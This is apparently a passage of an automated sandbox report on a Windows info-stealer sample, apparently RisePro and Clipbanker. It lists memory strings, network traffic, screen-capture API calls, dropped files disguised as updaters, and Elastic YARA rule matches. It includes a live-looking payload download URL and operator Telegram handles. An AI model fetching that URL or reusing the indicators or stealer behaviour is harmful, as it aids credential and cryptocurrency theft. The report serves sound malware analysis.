Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exeJG
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2220783088.0000000006480000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kuljyftgjk.online:80/server/k/l2.exemespace
Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp, MSIUpdaterV2.exe, 00000007.00000003.2217734150.000000000286A000.00000004.00000020.00020000.00000000.sdmp, llmcrdwzLnNKYB4T0Vnw.exe, 00000009.00000003.2209721688.0000000002C1B000.00000004.00000020.00020000.00000000.sdmp, AdobeUpdaterV2.exe.0.dr, l2[1].exe.0.dr, MSIUpdaterV2.exe.0.dr, oobeldr.exe.9.dr, EdgeMS2.exe.0.dr, llmcrdwzLnNKYB4T0Vnw.exe.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: file.exe, 00000000.00000002.4445088347.0000000006449000.00000004.00000020.00020000.00000000.sdmp, dZGGvSkztfgYu5jqSY21Wne.zip.0.dr	String found in binary or memory: https://t.me/RiseProSUPPORT
Source: file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2142639137.0000000006550000.00000004.00000020.00020000.00000000.sdmp, passwords.txt.0.dr	String found in binary or memory: https://t.me/risepro_bot
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_bot%(
Source: file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/risepro_botisepro_bot
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2121507295.0000000006548000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2115771934.0000000006495000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2113965338.0000000006495000.00000004.00000020.00020000.00000000.sdmp, OaQuGlYHO2B0Web Data.0.dr, UdeNZdOQSPDWWeb Data.0.dr, sl01HQPBKH54Web Data.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2220430384.000000000647F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2141059621.0000000006550000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3698823077.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4444160556.00000000016D3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2219971624.000000000647F000.00000004.00000020.00020000.00000000.sdmp, Firefox_v6zchhhv.default-release.txt.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: file.exe, 00000000.00000003.2111465574.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2127831309.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2123105572.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2124388373.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.4445088347.000000000647D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2121830577.000000000647D000.00000004.00000020.00020000.00000000.sdmp, 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.4445474316.0000000006530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/txt

Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705

Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.75.166:443 -> 192.168.2.5:49706 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D4C230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC,

0_2_06D4C230

Protection of GUI

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D29080 OpenDesktopA,CreateDesktopA,

0_2_06D29080

System Summary

Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000007.00000002.2220685526.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000008.00000002.2218340799.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.4441908172.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000012.00000002.2379291934.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown

Source: file.exe	Static PE information: section name: .vmp#+
Source: file.exe	Static PE information: section name: .vmp#+
Source: file.exe	Static PE information: section name: .vmp#+
Source: file.exe	Static PE information: section name: .vmpY[.
Source: file.exe	Static PE information: section name: .vmpY[.

Source: C:\Users\user\Desktop\file.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_06D2C480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,

0_2_06D2C480

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D4D540		0_2_06D4D540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2A230		0_2_06D2A230
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D29A10		0_2_06D29A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D33B60		0_2_06D33B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D4C990		0_2_06D4C990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D41980		0_2_06D41980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D6E63B		0_2_06D6E63B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2C760		0_2_06D2C760
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D81714		0_2_06D81714
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D324B0		0_2_06D324B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D7F43E		0_2_06D7F43E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D6E2DC		0_2_06D6E2DC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D472F0		0_2_06D472F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D44370		0_2_06D44370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D7C010		0_2_06D7C010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2FE50		0_2_06D2FE50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D6DF9A		0_2_06D6DF9A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D48F60		0_2_06D48F60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D45AB0		0_2_06D45AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D30B90		0_2_06D30B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D67880		0_2_06D67880
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D72840		0_2_06D72840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D2F9D0		0_2_06D2F9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D6E999		0_2_06D6E999
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06D24910		0_2_06D24910

Source: Joe Sandbox View	Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 06D66140 appears 58 times

Source: file.exe, 00000000.00000003.2199558318.000000000694F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000002.4443680764.0000000001125000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
Source: file.exe, 00000000.00000003.2195723746.0000000006946000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000000.1990364908.0000000001125000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe
Source: file.exe, 00000000.00000003.2196881348.0000000006945000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenamerangerpromostar_instrument1.exeX8 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 8.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 19.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 17.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 9.2.llmcrdwzLnNKYB4T0Vnw.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000011.00000002.2298062400.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 00000013.00000002.2460266314.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 00000009.00000002.2211800433.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
